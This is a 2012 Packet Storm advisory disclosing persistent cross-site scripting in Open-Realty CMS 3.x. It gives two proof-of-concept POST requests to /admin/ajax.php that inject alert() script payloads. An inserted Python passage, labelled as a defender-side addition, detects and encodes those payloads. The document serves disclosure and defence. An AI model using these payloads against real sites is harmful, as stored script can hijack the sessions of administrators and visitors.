Open-Realty CMS 3.x Cross Site Scripting

2012-12-26T00:00:00
ID PACKETSTORM:119106
Type packetstorm
Reporter Aung Khant
Modified 2012-12-26T00:00:00

Description

1. OVERVIEW  
  
Open-Realty CMS 3.x versions are vulnerable to Persistent Cross Site  
Scripting (XSS).  
  
  
2. BACKGROUND  
  
Open-Realty is the world's leading real estate listing marketing and  
management CMS application, and has enjoyed being the real estate web  
site software of choice for professional web site developers since  
2002.  
  
  
3. VULNERABILITY DESCRIPTION  
  
Multiple parameters are not properly sanitized, which allows an attacker  
to conduct Cross Site Scripting attacks. This may allow an attacker to  
create a specially crafted URL that would execute arbitrary script  
code in a victim's browser.  
  
  
4. VERSIONS AFFECTED  
  
3.x  
  
  
5. PROOF-OF-CONCEPT/EXPLOIT  
  
/admin/ajax.php (parameters: title, full_desc, ta)  
  
///////////////////////////////////////////////////////  
  
POST /admin/ajax.php?action=ajax_update_listing_data HTTP/1.1  
Host: localhost  
Content-Length: 574  
Origin: http://localhost  
X-Requested-With: XMLHttpRequest  
Content-Type: application/x-www-form-urlencoded  
Cookie: PHPSESSID=854a264c2f7766cea2edbfce6ffb02e7;  
  
edit=7305&title=test'%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&full_desc='%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&seotitle=test-7002&edit_active=yes&mlsexport=no&or_owner=2&notes=66&address=aaa&city=aaa&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&home_features%5B%5D=&community_features%5B%5D=&openhousedate=  
  
///////////////////////////////////////////////////////  
POST /admin/ajax.php?action=ajax_update_blog_post HTTP/1.1  
Host: localhost  
Proxy-Connection: keep-alive  
Content-Length: 112  
Origin: http://localhost  
X-Requested-With: XMLHttpRequest  
Content-Type: application/x-www-form-urlencoded  
Referer: http://localhost/admin/index.php?action=edit_blog_post&id=65  
Cookie: PHPSESSID=e2c83ff285b488f33d2c830979a38e09;  
  
blogID=65&title=about+us&ta='"><script>alert('Error')</script>&description=&keywords=&status=1&seotitle=about-us  
///////////////////////////////////////////////////////  
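As an added defender-side illustration (not code from the advisory or from Open-Realty): a small Python check that URL-decodes form bodies like the two PoC requests above, flags the title, full_desc and ta fields when their decoded value carries markup, and shows the HTML output encoding that would neutralise the stored payload. The request bodies are shortened copies of the advisory's PoCs, and the markup regex is an assumed heuristic, not a rule from the application.

```python
import re
from html import escape
from urllib.parse import parse_qs

# Fields the advisory names as unsanitised in /admin/ajax.php.
WATCHED_FIELDS = {"title", "full_desc", "ta"}

# Heuristic (an assumption, not an Open-Realty rule): a tag opener, a quote
# followed by '>', a javascript: URL or an on*= handler inside a plain-text
# listing/blog field is a strong sign of an injection attempt.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|[\"']\s*>|javascript:|\bon[a-z]+\s*=", re.I)

# Shortened copies of the two PoC request bodies from the advisory (constructed input).
LISTING_BODY = (
    "edit=7305&title=test'%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E"
    "&state=AK&zip=222&status=Active"
    "&full_desc='%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E"
    "&seotitle=test-7002&edit_active=yes&address=aaa&city=aaa"
)
BLOG_BODY = (
    "blogID=65&title=about+us&ta='\"><script>alert('Error')</script>"
    "&description=&keywords=&status=1&seotitle=about-us"
)

def suspicious_fields(body: str, watched=WATCHED_FIELDS) -> dict:
    """URL-decode a form body and return {field: decoded value} for every
    watched field whose value looks like HTML/JS rather than plain text."""
    hits = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if name in watched:
            for value in values:
                if MARKUP_RE.search(value):
                    hits[name] = value
    return hits

def render_safe(value: str) -> str:
    """Encode a stored value for an HTML text or attribute context. This is
    the output-side fix: the payload stays as data but can no longer break
    out of its context when the listing or blog post is rendered."""
    return escape(value, quote=True)

if __name__ == "__main__":
    for label, body in (("listing", LISTING_BODY), ("blog", BLOG_BODY)):
        for field, value in suspicious_fields(body).items():
            print(f"{label}: {field} -> {value!r}")
            print(f"  encoded: {render_safe(value)}")
```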
  
  
6. SOLUTION  
  
The vendor has not responded to the report since 2012-11-17.  
It is recommended that an alternate software package be used in its place.  
  
  
7. VENDOR  
  
Transparent Technologies Inc.  
http://www.transparent-support.com  
  
  
8. CREDIT  
  
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.  
  
  
9. DISCLOSURE TIME-LINE  
  
2012-11-17: Vulnerability Reported  
2012-12-25: Vulnerability Disclosed  
  
  
10. REFERENCES  
  
Original Advisory URL:  
http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_xss  
Open-Realty Home Page: http://www.open-realty.org/  
  
  
#yehg [2012-12-25]  
  
---------------------------------  
Best regards,  
YGN Ethical Hacker Group  
Yangon, Myanmar  
http://yehg.net  
Our Lab | http://yehg.net/lab  
Our Directory | http://yehg.net/hwd  